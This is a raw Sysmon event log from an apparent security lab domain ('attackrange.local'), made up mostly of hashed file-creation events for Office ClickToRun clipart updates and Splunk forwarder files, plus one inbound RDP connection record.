Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD09031_.WMFMD5=396CD9869CE47A1627240F38CDAB5D63,SHA256=5180AF38F8A3DBE746BD4F8783B18D543789668D275B33BE4286FFF999235EA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD08868_.WMFMD5=CDEF95D10FB9121A59DC677181C4C044,SHA256=46A080B76870FE52EED4D5FF1CA35E5228AEBF29BE9ECD2E3F627993EC942683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD08808_.WMFMD5=E6EAD4172E386DAFFBF5FA2E77BB5C6A,SHA256=80AAEF04ED63053AE0E7D260283A51155D515A3A4C027113F3D09D7F6134FBA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD08773_.WMFMD5=52448092821EC4570EC5F305DE7329B1,SHA256=EA3A0D6C9FCC34B0236699AEF048742CFC293E60A8C3AA07CCF5D67ECE5BD8E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD08758_.WMFMD5=AD33B59469156002FFC695EA43AB4893,SHA256=FBA3E7963C8207BB77AFB502B21D98138109F20E074BDFE0B1510B04E3B8572A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD07831_.WMFMD5=F920A71B55FCE29447CC6D69BF99337F,SHA256=83DA135192C2224DC6E1FC3BC56828F3D73D31646E25B85DE0FD7F29F5109C2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD07804_.WMFMD5=BD76CE413D7DFF0D025CE085298037A3,SHA256=F73715AB28325712C0E8E88DD3DA69C25A44F3AC78F8B6E1B6474C9D42042A3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD07761_.WMFMD5=66D3184A38DC3D6631EDC8D3608BE2AE,SHA256=D09DD5D7C264164C57BEA90F053233AF43FA00F75D2A870E70C4AC6CEF2DD03B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD06200_.WMFMD5=9DD99D96E55113400422A464EE178E37,SHA256=54406B6E65BEFA3B1A34F12C7857C4A1C5739CA22675C57EDA332B036A0C328D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD06102_.WMFMD5=04583171D83D200469AD6088B05449E2,SHA256=6ECDAD323AB883888E2F020B14C5C25F47EEAB83C4B012C5AC8E8B9FE129EFAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD05119_.WMFMD5=62DAF0C3FBDD135CF8EC477F2F11E17A,SHA256=ABDCD97429AE5ACBD8BCCBBF039014CA4A5752E6B41DDA6B4E729979CB64A5B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD00173_.WMFMD5=5D7AEB72711CB674739E6E33B8073E03,SHA256=9B7326E05EB808947CE451B50FA9F1EC32987330547FA98CEE00C155A528EE08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD00160_.WMFMD5=90DF7DCF33142BE48B3DA9EBAE224B57,SHA256=CFEC77B263D1FF44D4F1A64010D8F9ABFF5E78A71793A8296AE7E8DF40BB94F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD00155_.WMFMD5=01BFABFC6EAEF253DCCB6D4D45196C6E,SHA256=BBEC61FFB1193A8BD1A424E75C3259F26E88155CDD405CD6191F4100FAE9D96A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD00146_.WMFMD5=D489913C188900F7FE8DF05BD0A55FAB,SHA256=E327E6AE80F24BC384A3892226B02A72600036B1A48E3E6F603CA5887135866C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD00141_.WMFMD5=AE6ACE3B1756786D1DBED721E7A8462E,SHA256=86204EC45B9EE029BB2E6EE1422601E8405EA7C059B083326B3DDFB73BE3FF7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BD00116_.WMFMD5=47E36622EA6B81DC5818092517C6E616,SHA256=F3C3ECA3F2789BC6E51EE10B461A88101757269178DE15B11264CE32CDDFAFA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\BABY_01.MIDMD5=0628838A120768F518472ACB9F83E89B,SHA256=55A3C3911C658865F8A2398CA0FFB0377F33A36B685D8441DF9D0A70AB6F7DF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04385_.WMFMD5=DE3BBBA31619BFCFFFEC40796A9C7C47,SHA256=E103F7E4FB9C87D9412526D18E2700AC1073FAAF8D94EC78217F0E8157A6081C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04384_.WMFMD5=E59BE0BC57614ACBA6CF4F9E6316FF47,SHA256=E5F357F5A890913F2D17E1292D8B61A5E4CDE9A14FE8AF443E24F431A2C93B1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04369_.WMFMD5=6F19C844D26845FDD6DBC81163CF0330,SHA256=ECBD0D848F74FE28FAAE41B442A27F83F69FE0F5AF4CB941EFE6A06BF03D0150,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04355_.WMFMD5=D05533EA48BE853BF7A977953588F10B,SHA256=5F96ECFD4B31855BEF7CFBC496300F8A86EBA4AA65FCC4EA7E20DBBB24058B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.002{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04332_.WMFMD5=66B7EFA3F048B255A6873F0CEC560A4D,SHA256=65B017076AC0C3638A3DF5F39C54261EDF5C4ED08200BA1CD7570E0F9ED922EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04326_.WMFMD5=27680B89A776CE06E6FD08935739C9CB,SHA256=C46268500623904F8CCF1984319E1328C355870CA6A110FD0539E3DFE2B45B2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04323_.WMFMD5=A211A2DF3778A9560D3C5DAEBDBB5202,SHA256=A178363267084CCC361E83909FB3FA36907B4A8C79D34B1E26F8F5C4D0F294E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\AN04269_.WMFMD5=3AD4CA38A9950EFDB9BF02E37F77E6D3,SHA256=40ACCA01879B04D09E7231A7A41B20DB713CAD7AF9AE8772D3A024DD19D73EF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049715Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:06.540{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60380-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049714Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:08.565{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=918FDF884EE80F8CE41FAC8A04147F22,SHA256=ECF47EADBB33FFC599A6451E353A5CB2DC9D99CA8FEC31FBB8580317E116DE41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049713Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:08.424{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7354687B043B50B517D206B4122664B0,SHA256=B1E10805D3726009B3DCB7A1571D80AB137384EED7470B31C1A0BD6F10ADFF5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02265_.WMFMD5=A5805CFD8F9546FE2F5C5B9FDA8C9477,SHA256=415D3B4324A8DE3404EBDA4BD59D36479F1C77B3B5B870EFA31B8A0DBBE5C0C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02263_.WMFMD5=2097A0D282D6AD2B5B39B1431C352EE9,SHA256=F55B2C784F32083C236DA05818E3D8DD82A2B6B4B2C968CE1009F12328327772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02262_.WMFMD5=2E6427E5E8C1ED53CA9D15B80873FFA1,SHA256=8B99C52D164485EC0070877C8F776A60B2A13729DFC308DE2CDFCEE78CB3358F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02169_.WMFMD5=296EACF14777D2877FB3611D6157EC7E,SHA256=D689E9E021A1410304D8D6C3B05D356FC249778885E0BE166A1B19448FEB5563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE02120_.WMFMD5=8ADA67622884FD86723E020C97E4647F,SHA256=EA3BDBBA7EDB31468BB755D442549B518FAEF8EBF73E4D7A2B053A3C40AB9EED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE01797_.WMFMD5=218D031AC79EBCBAE7C5C66DF7FA9C6E,SHA256=7C863A2F7535E608D82B9641D2A31C38BAD416BDD01BF1652D7A0E5CF51129D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE01661_.WMFMD5=DB159D8AE5351E724BCE76B38D8B0ED8,SHA256=4EB86BE8B24CE45D29F932B6D344688DE4FF360BB0A5613D9CB8B1307E4E35A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE01191_.WMFMD5=BA473F9B3A2EA8E96019272C09C052C0,SHA256=46DE5468DA6FD6A9AD08CA22318CD086F3EE0009AB7F08F1929F9CA8A4936910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE01172_.WMFMD5=A1C26F053989B2FA03D596EB96FE8880,SHA256=04FB901CBD8FE345FA8C54F69E630FB079757BAABF029EA9BBDE13B5947281C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE01160_.WMFMD5=7C5FFE4E3BF3FC05B17C94338418C826,SHA256=66285C71B698D6B19FE4CEF15FE8B62C31B966B10720D126ADAEE254CBA6591D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00998_.WMFMD5=7A17F7240511BC50A407CE7397277DC1,SHA256=098EB57E9BFB7934E40620F66ADB3F61A960B283E6532062D9520C0AEEB88E82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00934_.WMFMD5=5C1208117438214162737D808CDD6D3D,SHA256=E77CE90AF443BD0CE52A36A817D9FA55E8BD30BE800880AA735679C0545D66F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00898_.WMFMD5=5C2D49A777A88D5FA0425186EE763A85,SHA256=0AC1FD2067235CE78B1737157C0350EB0035E7B67DBF188A9D5C35F7F8C6D79C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00833_.WMFMD5=E864F0CC31844ABC8669D560F225078B,SHA256=A0E2B6E0A4ED0B83681246B793AA3F1033522F0849C82D4ACBF6FC21646632C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00737_.WMFMD5=DEED8F39383FFF593277B04CD387EC29,SHA256=56E088A7D11D785A25D9F5FC405D03CBCE8FE18C129BD5AE81A690A1950E823A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00726_.WMFMD5=E30798D4CC922A94CF05C75C13E46D67,SHA256=953444F109A1F00D93117CC25662F126F0F2024AA03EF382B480392AA7165EFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\PE00723_.WMFMD5=665B8B34CB1E8BCC67DC114D7BA69D22,SHA256=7607365A20DBA0E07D4BAD678C6497499DCDB516E6B06BC06E77AAFD81F99084,IMPHASH=00000000000000000000000000000000falsetrue 